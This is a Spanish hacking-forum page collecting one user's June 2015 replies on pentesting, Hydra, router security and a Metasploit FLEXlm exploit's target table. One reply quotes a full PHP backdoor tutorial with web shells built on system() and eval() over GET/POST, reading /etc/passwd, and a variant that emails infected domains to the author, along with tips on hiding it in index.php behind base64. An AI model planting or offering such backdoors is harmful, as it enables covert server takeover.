Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Snifer

Páginas 1 ... 12 13 14 15 16 ... 68
#261
Dudas y pedidos generales / Re:Dirigir trafico de la red a una web clonada
Junio 21, 2015, 12:28:24 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo que está preguntando es !! crear un fake de una web, ejemplo facebook, y redirigir los pcs de su red interna al index.html que tiene esperando en su localhost.

Creo que la mejor respuesta es la de Epilson ,con dnsspoof para que cuando los pcs de su red interna hagan la petición a facebook los rediriga a su fake.

Si estoy equivocado disculparme saludos

Lo mismo entendí porque hacer la modificación local solo servira para una persona! xD.

Regards,
Snifer
#262
Ruby / Re:Guia de como instalar Rails en Kali
Junio 21, 2015, 12:52:32 AM
Pero lo que haces en tu post es crear un virtual enviroment :P  para que no afecte a la versión de la distro, entonces si ando en un Cyborg no funcionará?? x'D.


Regards,
Snifer

#263
Ruby / Re:Guia de como instalar Rails en Kali
Junio 21, 2015, 12:06:42 AM
Hola que tal, una critica constructiva deberias de cambiar el título del post por otro mas genérico ya que esta instalación es realizada en cualquier distro basada en Debian.

Y una duda! hacer un apt-get install sin permisos de sudo?? como le hiciste eso!

xD

Regards,
Snifer
#264
Debates, Reviews y Opiniones / Re:Encuesta sobre Ingenieria Inversa
Junio 20, 2015, 12:56:10 AM
Si, es necesario conocer ASM, y C/C++ como mínimo debido a que para analizar un bicho es mas que necesario.

Regards,
Snifer

PD: Obvio que esto entra como base ya que depende a que realizar ingenieria inversa, si será un apk ahí necesitas conocer JAVA.
#265
Dudas y pedidos generales / Re:Dudas con Hydra
Junio 19, 2015, 12:15:02 AM
U__u falsos positivos ...

Regards,
Snifer
#266
Dudas y pedidos generales / Re:Vulnerabilidad en código Javascript
Junio 19, 2015, 12:13:38 AM
Es enserio?  :-\


Regards,
Snifer
#267
Dudas y pedidos generales / Re:ATAQUE DDoS A MI ROUTER
Junio 18, 2015, 05:25:24 PM
Tal cual lo que dice Black ademas de ello haz lo siguiente adicionado a lo indicando por el.

1.- Desconecta la salida a internet de tu router.
2.- Conectate directamente con la PC al router y revisa por curiosidad si gustas para donde va el ataque que te hizo lo comentado por @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
3.- Reinicia tu router cambia credenciales por otros que sean fuertes.
4.- Revisa si tu router no es vulnerable.

Regards,
Snifer
#268
Dudas y pedidos generales / Re:Dudas con Hydra
Junio 18, 2015, 05:20:21 PM
Direccionarios?

Bueno, si podrias indicar cual es el parámetro y a que aplicación o servicio estas haciendo la prueba?

Regards,
Snifer
#269
Dudas y pedidos generales / Re:Duda con servicio FLEXLM y exploit para el mismo
Junio 18, 2015, 11:48:09 AM
Hola que tal, por si no sabes Metasploit es bastante amigable para realizar alguna busqueda con search (LO QUE BUSCAS) O en otro caso ir a rapid7 y buscas en el caso de que no tengas actualizado a la ultima versión referente a los exploits por cierto hoy lanzarón nuevos recursos.

Por otro parte el servicio, que nombras si la memoria no me falla es alguno servicio de los productos de Embarcadero algo de google no viene mal para revisar y validar, por otro lado el comentario de Black hace referencia un exploit que hace un Buffer Overflow y en los targets no esta el Win8 xD. ademas que va pa otro lado el target!!! ;)

Código: text

            'Targets'        =>
                [
                    [ 'Debug', {} ],
                    [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
                        {
                            'Offset' => 10476,
                            'ShellcodeOffset' => 5504,
                            'Ret' => 0x0047d01f # ppr from lmgrd.exe
                        }
                    ],
                    [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
                        {
                            'Offset' => 7324,
                            'ShellcodeOffset' => 2332,
                            'Ret' => 0x004eda91 # ppr from lmgrd.exe
                        }
                    ],
                    [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
                        {
                            'Offset' => 7320,
                            'ShellcodeOffset' => 2328,
                            'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
                        }
                    ],
                ],


Ahí se ve lo mencionado va para Windows XP.. Espero te sirva el aporte.

PD: Ja jaj ja jaja cada respuesta que veo....

Regards,
Snifer
#270
Dudas y pedidos generales / Re:En que seccion puedo publicar reviews de libros?
Junio 17, 2015, 09:36:00 AM
Solo sera un review! revisión no deberia de ir por esos lares, lo mejor seria en OFFTOPIC! a mi parecer.

Regards,
Snifer
#271
Dudas y pedidos generales / Re:[DUDA] Con Pentesting a una Web
Junio 17, 2015, 09:35:15 AM
Por lo visto andas disparanado balas sin tener una mira, antes de todo inicia el proceso del pentesting iniciando desde 0 es decir.

Registro de Dominio
Información de servicios. (Vulnerables no vulnerables)
Reverse IP (Si hubieran mas bichos por ahí trata de escalar)
Escaneo manual, identifica posibles variables de explotación o ataques.
Escaneo automático si tienes la posibilidad.
Arma una tabla de criticidad.
(Solo por nombrar algunos ;). )

OJO: "Si te han contratado" estas cometiendo un grave error! al compartir el enlace del sitio que estas haciendo la prueba, podria acarrearte algun problema por la privacidad que tu debes de tener no es soltar y lanzar a todos. Del mismo modo antes de lanzar algun exploit o cualquier cosa valida si en los TOS es posible realizar ello sin ninguna limitante, es decir si no tiene que tener conocimiento la contraparte, no vaya a ser una DoS que lanzes y el sitio necesite estar online 24x7.

Regards
Snifer

No seas un mono con Gillet !

#272
Seguridad / Re: Detectando ataques ARP Spoofing
Junio 16, 2015, 04:11:42 PM
Hola que tal buen video lo unico cambiaria el título del post como del video

Detectando ataques arp Spoofing desde Linux,  o con tal herremienta ya que el script usado solo llega a ser funcional para Windows.

Regards,
Snifer
#273
Ideas y Sugerencias / Re:Eliminar Sub-Foro de Descarga de Malware.
Junio 15, 2015, 04:01:09 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
:P La propuesta al parecer no fue aceptada... Fin del Tema.

Cierren el Post. 8)

Puedes cerrarlo tu  ¬¬°
#274
Hacking / Re:Espiar a todo el mundo por Camaras
Junio 15, 2015, 11:20:55 AM
Quzas te falta flash o por politicas no te permiten visualizar prueba saliendo por proxy, o que las urls del post no se encuentren ya caidas.

Regards,
Snifer
#275
Seguridad web y en servidores / Re:Backdooring con PHP.
Junio 15, 2015, 10:25:36 AM
Exacto!  el detalle esta el realizar cambios solo de código y hacerlo pasar como si fuera de uno si Okol saco xD npi! yo a lo que me recordé indique como dices toca esperar que dice el autor como también los responsables de dicho foro.

Regards,
Snifer
#276
Seguridad web y en servidores / Re:Como hacer un backdoor con weevely
Junio 15, 2015, 08:29:05 AM
 ??? sudo weevely y luego sin estar como superusuario o solo le diste permisos de root a todo el programa?

Regards,
Snifer
#277
Seguridad web y en servidores / Re:Backdooring con PHP.
Junio 15, 2015, 07:44:09 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Brother no fue el único que copia y pega aquí... sin dejar creditos... Déjalo al menos vuelve a aportar algo util (temas que habia olvidado)

...Y ese tema no es de OKOL, es de Cesar publicado en el 2009...

Saludos.

Entonces lo dejo que siga copy y paste en todo? ademas de no ser el único post? dejo que crezca la ignorancia de las personas y que se acostumbren a ello? solo porque recupera post del ayer? xDDDD Buena tu lógica.

Si fuera de Cesar o de Okol la cuestión es que yo conozco de Okol lo que me acordé, y bueno si tienes fuente original comparte.

Regards,
Snifer

PD: Y no aparece...
#278
C / C++ / Re:Programa un virus en C sin ser detectado por nada "Source"
Junio 15, 2015, 01:36:40 AM
Si quieres jugar con tu esposa y hacerle pasar el rato, elimina todo el C:/ con permisos de administrador.

Ya enserio, si eres persona casada y quieres hacer este tipo de jueguitos, dejame decirte que pareces mas un niño inmaduro, revisa como compilar que es C? minimamente sabes que es ello, andas comenzando investiga ;).

Regards,
Snifer
#279
Ideas y Sugerencias / Re:Eliminar Sub-Foro de Descarga de Malware.
Junio 15, 2015, 01:18:37 AM
RANITA no te canses! que no pasara nada!  8)
#280
Seguridad web y en servidores / Re:Backdooring con PHP.
Junio 15, 2015, 01:08:50 AM
WTF?? ?


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola Underc0deanos, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citaruna puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código: php
<?php
system('comando');
?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código: php
<?php
$var = @system($_GET['ejec']);
?>

Podriamos entrar desde:
CitarYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

un ejemplo así:
CitarYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código: php
<?php
echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código: php
<?php
echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
?>

Mostrará la ruta de el script, es decir si estamos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código: php
<?php
echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
?>

Te mostrará en la pantalla Estamos en el dominio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código: php
<?php
mail('[email protected]', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido "Hola
mucho gusto soy y una IP".

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código: php
<?php
$var = eval("echo 'hola underc0de';");
?>
Si lo ejecutamos veremos que nos mostrará: hola underc0de. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código: php
<?php
$var eval($_GET['ejec']);
?>

lo usamos de está forma:
CitarYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código: php
<?php
$var = system($_POST['ejec');
$domain = $_SERVER['SERVER_NAME'];
$ruta = $_SERVER['PHP_SELF'];
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues encriptamos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código: php
<?php
$var = eval($_POST['ejec');
$domain = $_SERVER['SERVER_NAME'];
$ruta = $_SERVER['PHP_SELF'];
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

Saludos, Payasako.

Post que veo tuyo sin ofender post que no pones los creditos o bien modificas una que otra cosa sacando títulos y demas, lo que posteaste! o compartiste tus conocimientos es un lindo paper del Odiado y amado por muchos Okolcito aka Okol. Ahhh antes que me olvide el paper de Okol esta en la Biblioteca de UC

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Payasako supongo que eres un chico que anda iniciando en estos lares, mejor poner fuente ;) campeón.


Hasta la despedida está idéntica  solo te falto el Saludos OKOL.

PD: Hasta coin!!! x'D como cambiaron las cosas por aquí.


Regards,
Snifer
Páginas 1 ... 12 13 14 15 16 ... 68